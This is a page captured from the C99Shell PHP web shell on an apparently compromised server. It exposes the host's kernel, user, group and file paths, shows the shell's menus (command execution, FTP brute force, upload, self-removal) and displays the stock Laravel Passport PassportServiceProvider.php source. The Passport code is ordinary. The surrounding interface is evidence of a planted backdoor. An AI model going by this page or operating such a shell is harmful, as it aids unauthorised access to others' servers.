!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/inventory.picotech.app/public_html/vendor/laravel/passport/src/   drwxr-xr-x
Free 28.55 GB of 117.98 GB (24.2%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     PassportServiceProvider.php (9.5 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Laravel\Passport;

use 
DateInterval;
use 
Illuminate\Auth\Events\Logout;
use 
Illuminate\Auth\RequestGuard;
use 
Illuminate\Config\Repository as Config;
use 
Illuminate\Support\Facades\Auth;
use 
Illuminate\Support\Facades\Cookie;
use 
Illuminate\Support\Facades\Event;
use 
Illuminate\Support\Facades\Request;
use 
Illuminate\Support\ServiceProvider;
use 
Laravel\Passport\Bridge\PersonalAccessGrant;
use 
Laravel\Passport\Bridge\RefreshTokenRepository;
use 
Laravel\Passport\Guards\TokenGuard;
use 
Lcobucci\JWT\Configuration;
use 
Lcobucci\JWT\Parser;
use 
League\OAuth2\Server\AuthorizationServer;
use 
League\OAuth2\Server\CryptKey;
use 
League\OAuth2\Server\Grant\AuthCodeGrant;
use 
League\OAuth2\Server\Grant\ClientCredentialsGrant;
use 
League\OAuth2\Server\Grant\ImplicitGrant;
use 
League\OAuth2\Server\Grant\PasswordGrant;
use 
League\OAuth2\Server\Grant\RefreshTokenGrant;
use 
League\OAuth2\Server\ResourceServer;

class 
PassportServiceProvider extends ServiceProvider
{
    
/**
     * Bootstrap the application services.
     *
     * @return void
     */
    
public function boot()
    {
        
$this->loadViewsFrom(__DIR__.'/../resources/views''passport');

        
$this->deleteCookieOnLogout();

        if (
$this->app->runningInConsole()) {
            
$this->registerMigrations();

            
$this->publishes([
                
__DIR__.'/../database/migrations' => database_path('migrations'),
            ], 
'passport-migrations');

            
$this->publishes([
                
__DIR__.'/../resources/views' => base_path('resources/views/vendor/passport'),
            ], 
'passport-views');

            
$this->publishes([
                
__DIR__.'/../config/passport.php' => config_path('passport.php'),
            ], 
'passport-config');

            
$this->commands([
                
Console\InstallCommand::class,
                
Console\ClientCommand::class,
                
Console\HashCommand::class,
                
Console\KeysCommand::class,
                
Console\PurgeCommand::class,
            ]);
        }
    }

    
/**
     * Register Passport's migration files.
     *
     * @return void
     */
    
protected function registerMigrations()
    {
        if (
Passport::$runsMigrations && ! config('passport.client_uuids')) {
            
$this->loadMigrationsFrom(__DIR__.'/../database/migrations');
        }
    }

    
/**
     * Register the service provider.
     *
     * @return void
     */
    
public function register()
    {
        
$this->mergeConfigFrom(__DIR__.'/../config/passport.php''passport');

        
Passport::setClientUuids($this->app->make(Config::class)->get('passport.client_uuids'false));

        
$this->registerAuthorizationServer();
        
$this->registerClientRepository();
        
$this->registerJWTParser();
        
$this->registerResourceServer();
        
$this->registerGuard();
    }

    
/**
     * Register the authorization server.
     *
     * @return void
     */
    
protected function registerAuthorizationServer()
    {
        
$this->app->singleton(AuthorizationServer::class, function () {
            return 
tap($this->makeAuthorizationServer(), function ($server) {
                
$server->setDefaultScope(Passport::$defaultScope);

                
$server->enableGrantType(
                    
$this->makeAuthCodeGrant(), Passport::tokensExpireIn()
                );

                
$server->enableGrantType(
                    
$this->makeRefreshTokenGrant(), Passport::tokensExpireIn()
                );

                
$server->enableGrantType(
                    
$this->makePasswordGrant(), Passport::tokensExpireIn()
                );

                
$server->enableGrantType(
                    new 
PersonalAccessGrantPassport::personalAccessTokensExpireIn()
                );

                
$server->enableGrantType(
                    new 
ClientCredentialsGrantPassport::tokensExpireIn()
                );

                if (
Passport::$implicitGrantEnabled) {
                    
$server->enableGrantType(
                        
$this->makeImplicitGrant(), Passport::tokensExpireIn()
                    );
                }
            });
        });
    }

    
/**
     * Create and configure an instance of the Auth Code grant.
     *
     * @return \League\OAuth2\Server\Grant\AuthCodeGrant
     */
    
protected function makeAuthCodeGrant()
    {
        return 
tap($this->buildAuthCodeGrant(), function ($grant) {
            
$grant->setRefreshTokenTTL(Passport::refreshTokensExpireIn());
        });
    }

    
/**
     * Build the Auth Code grant instance.
     *
     * @return \League\OAuth2\Server\Grant\AuthCodeGrant
     */
    
protected function buildAuthCodeGrant()
    {
        return new 
AuthCodeGrant(
            
$this->app->make(Bridge\AuthCodeRepository::class),
            
$this->app->make(Bridge\RefreshTokenRepository::class),
            new 
DateInterval('PT10M')
        );
    }

    
/**
     * Create and configure a Refresh Token grant instance.
     *
     * @return \League\OAuth2\Server\Grant\RefreshTokenGrant
     */
    
protected function makeRefreshTokenGrant()
    {
        
$repository $this->app->make(RefreshTokenRepository::class);

        return 
tap(new RefreshTokenGrant($repository), function ($grant) {
            
$grant->setRefreshTokenTTL(Passport::refreshTokensExpireIn());
        });
    }

    
/**
     * Create and configure a Password grant instance.
     *
     * @return \League\OAuth2\Server\Grant\PasswordGrant
     */
    
protected function makePasswordGrant()
    {
        
$grant = new PasswordGrant(
            
$this->app->make(Bridge\UserRepository::class),
            
$this->app->make(Bridge\RefreshTokenRepository::class)
        );

        
$grant->setRefreshTokenTTL(Passport::refreshTokensExpireIn());

        return 
$grant;
    }

    
/**
     * Create and configure an instance of the Implicit grant.
     *
     * @return \League\OAuth2\Server\Grant\ImplicitGrant
     */
    
protected function makeImplicitGrant()
    {
        return new 
ImplicitGrant(Passport::tokensExpireIn());
    }

    
/**
     * Make the authorization service instance.
     *
     * @return \League\OAuth2\Server\AuthorizationServer
     */
    
public function makeAuthorizationServer()
    {
        return new 
AuthorizationServer(
            
$this->app->make(Bridge\ClientRepository::class),
            
$this->app->make(Bridge\AccessTokenRepository::class),
            
$this->app->make(Bridge\ScopeRepository::class),
            
$this->makeCryptKey('private'),
            
app('encrypter')->getKey(),
            
Passport::$authorizationServerResponseType
        
);
    }

    
/**
     * Register the client repository.
     *
     * @return void
     */
    
protected function registerClientRepository()
    {
        
$this->app->singleton(ClientRepository::class, function ($container) {
            
$config $container->make('config')->get('passport.personal_access_client');

            return new 
ClientRepository($config['id'] ?? null$config['secret'] ?? null);
        });
    }

    
/**
     * Register the JWT Parser.
     *
     * @return void
     */
    
protected function registerJWTParser()
    {
        
$this->app->singleton(Parser::class, function () {
            return 
Configuration::forUnsecuredSigner()->parser();
        });
    }

    
/**
     * Register the resource server.
     *
     * @return void
     */
    
protected function registerResourceServer()
    {
        
$this->app->singleton(ResourceServer::class, function ($container) {
            return new 
ResourceServer(
                
$container->make(Bridge\AccessTokenRepository::class),
                
$this->makeCryptKey('public')
            );
        });
    }

    
/**
     * Create a CryptKey instance without permissions check.
     *
     * @param  string  $type
     * @return \League\OAuth2\Server\CryptKey
     */
    
protected function makeCryptKey($type)
    {
        
$key str_replace('\\n'"\n"$this->app->make(Config::class)->get('passport.'.$type.'_key') ?? '');

        if (! 
$key) {
            
$key 'file://'.Passport::keyPath('oauth-'.$type.'.key');
        }

        return new 
CryptKey($keynullfalse);
    }

    
/**
     * Register the token guard.
     *
     * @return void
     */
    
protected function registerGuard()
    {
        
Auth::resolved(function ($auth) {
            
$auth->extend('passport', function ($app$name, array $config) {
                return 
tap($this->makeGuard($config), function ($guard) {
                    
app()->refresh('request'$guard'setRequest');
                });
            });
        });
    }

    
/**
     * Make an instance of the token guard.
     *
     * @param  array  $config
     * @return \Illuminate\Auth\RequestGuard
     */
    
protected function makeGuard(array $config)
    {
        return new 
RequestGuard(function ($request) use ($config) {
            return (new 
TokenGuard(
                
$this->app->make(ResourceServer::class),
                new 
PassportUserProvider(Auth::createUserProvider($config['provider']), $config['provider']),
                
$this->app->make(TokenRepository::class),
                
$this->app->make(ClientRepository::class),
                
$this->app->make('encrypter')
            ))->
user($request);
        }, 
$this->app['request']);
    }

    
/**
     * Register the cookie deletion event handler.
     *
     * @return void
     */
    
protected function deleteCookieOnLogout()
    {
        
Event::listen(Logout::class, function () {
            if (
Request::hasCookie(Passport::cookie())) {
                
Cookie::queue(Cookie::forget(Passport::cookie()));
            }
        });
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--